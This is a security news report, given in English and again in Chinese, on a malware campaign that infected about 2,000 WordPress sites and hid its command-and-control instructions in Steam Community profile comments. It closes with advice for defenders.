A newly discovered malware campaign has compromised close to 2,000 WordPress websites by leveraging an unlikely hiding place for its command-and-control infrastructure: Steam Community profile comments. The technique exploits the trust that network security tools and system administrators place in Valve's popular gaming platform to silently deliver malicious payloads.
The campaign was uncovered by security researchers at Sucuri, as reported by BleepingComputer on 1 June. According to the findings, attackers inject malicious code into compromised WordPress sites that reaches out to an attacker-controlled Steam Community profile to retrieve its operational instructions — turning a mainstream gaming platform into a covert communication channel.
How the Attack Works
The malware planted on infected WordPress sites contains JavaScript or PHP code that makes requests to a Steam Community profile page controlled by the attacker. Hidden within that profile's comment section are encoded strings that function as commands or payload fragments. Because Steam is a widely trusted, legitimate domain — and its community pages accept user-generated content with minimal filtering — the requests typically sail past firewall rules, content security policies, and blocklist-based detection systems without raising flags.
Once the infected site retrieves the encoded data from the Steam profile comments, the malicious code decodes it and executes whatever instructions it contains. This could range from redirecting visitors to phishing pages, injecting cryptocurrency miners, or deploying additional malware payloads.
The use of Steam as a C2 intermediary is notable for its simplicity and effectiveness. Security teams routinely whitelist major platforms like Steam, and the volume of legitimate traffic to steamcommunity.com makes anomalous requests extremely difficult to spot in network logs.
Why Traditional Defences Fall Short
The campaign exposes a fundamental weakness in perimeter-based and signature-driven security approaches. Static blocklists cannot account for every legitimate service that an attacker might co-opt, and whitelisting trusted domains creates blind spots that sophisticated adversaries are increasingly eager to exploit.
Sucuri's research notes that this is not the first time attackers have abused well-known platforms for C2 purposes — services like Telegram, GitHub, and even Pastebin have been used similarly. However, the use of Steam Community profile comments is a relatively novel twist that broadens the attack surface.
For WordPress site operators, the campaign underscores the importance of keeping CMS installations, themes, and plugins fully patched. Many of the nearly 2,000 compromised sites likely fell victim through known vulnerabilities in outdated or abandoned plugins — a persistent problem across the WordPress ecosystem, where maintenance quality and update frequency vary wildly from one plugin to the next. Keeping a tight, well-curated plugin inventory is as important as patching itself.
The Bigger Picture
The technique reflects a broader trend in the threat landscape: attackers are shifting away from infrastructure they control directly and instead piggybacking on trusted third-party services. This makes attribution harder, takedowns more complicated, and detection far more challenging for defenders relying on conventional tools.
Organisations running WordPress should prioritise integrity monitoring of core files and database content, implement behavioural analysis capable of flagging outbound requests to unusual destinations — even when those destinations are trusted domains — and audit their sites regularly for injected scripts. In a threat environment where even a gaming platform's comment section can serve as an attack vector, proactive anomaly detection has become essential rather than optional.
一場新近發現的惡意軟件攻擊行動,已透過一個意想不到的隱藏地點——Steam 社區個人檔案的留言區——來承載其命令與控制基礎設施,從而入侵了近 2,000 個 WordPress 網站。此技術利用了網絡安全工具及系統管理員對 Valve 旗下這款熱門遊戲平台的信任,靜默地傳遞惡意載荷。
此攻擊行動由 Sucuri 的安全研究人員發現,並由 BleepingComputer 於 6 月 1 日報導。根據研究結果,攻擊者將惡意代碼注入受感染的 WordPress 網站,該代碼會連接至一個由攻擊者控制的 Steam 社區個人檔案,以獲取其操作指令——將一個主流遊戲平台變成了秘密的通信渠道。
攻擊運作方式
種植於受感染 WordPress 網站上的惡意軟件包含 JavaScript 或 PHP 代碼,這些代碼會向一個由攻擊者控制的 Steam 社區個人檔案頁面發出請求。隱藏在該個人檔案留言區內的是經過編碼的字串,其功能等同於指令或載荷片段。由於 Steam 是一個廣受信任的合法域名,且其社區頁面接受用戶生成內容,過濾機制相對寬鬆,因此這些請求通常能輕易繞過防火牆規則、內容安全策略以及基於黑名單的偵測系統,不會觸發警報。
一旦受感染的網站從 Steam 個人檔案留言中獲取到編碼數據,惡意代碼便會將其解碼並執行其中包含的任何指令。這可能包括將訪客重新導向至釣魚網頁、注入加密貨幣挖礦程式,或部署額外的惡意軟件載荷。
將 Steam 用作 C2 中介工具,其顯著之處在於其簡易性和有效性。安全團隊通常會將 Steam 等主要平台加入白名單,而流向 steamcommunity.com 的合法流量龐大,使得異常請求在網絡日誌中極難被發現。
傳統防禦為何不足
此攻擊行動暴露了基於邊界防禦及依賴特徵碼偵測的安全方法的根本弱點。靜態黑名單無法涵蓋攻擊者可能濫用的每一項合法服務,而將受信任域名加入白名單則會產生盲點,而經驗豐富的攻擊對手正日益樂於利用這些盲點。
Sucuri 的研究指出,這並非攻擊者首次濫用知名平台進行 C2 活動——Telegram、GitHub 甚至 Pastebin 等服務也曾被類似利用。然而,利用 Steam 社區個人檔案留言的方式是一個相對新穎的變體,擴大了攻擊面。
對於 WordPress 網站運營者而言,此攻擊行動強調了確保內容管理系統安裝、主題及外掛程式保持完全更新修補的重要性。近 2,000 個受感染的網站中,許多很可能是因為使用了過時或已被廢棄的外掛程式中的已知漏洞而受害——這是 WordPress 生態系統中一個持續存在的問題,不同外掛程式的維護質量和更新頻率差異懸殊。維護一個緊密、精心管理的外掛程式清單,與執行修補本身同樣重要。
更宏觀的視角
此技術反映了威脅形勢中的一個更廣泛趨勢:攻擊者正逐漸遠離他們直接控制的基礎設施,轉而依附於受信任的第三方服務。這使得溯源更加困難,採取下架行動更為複雜,也讓依賴傳統工具的防禦者更難進行偵測。
運行 WordPress 的組織應優先對核心檔案和數據庫內容實施完整性監控,部署能夠標記異常目的地外聯請求的行為分析——即使這些目的地是受信任的域名——並定期對其網站進行腳本注入審計。在一個連遊戲平台的留言區都可能成為攻擊向量的威脅環境中,主動的異常偵測已成為必需而非可選項。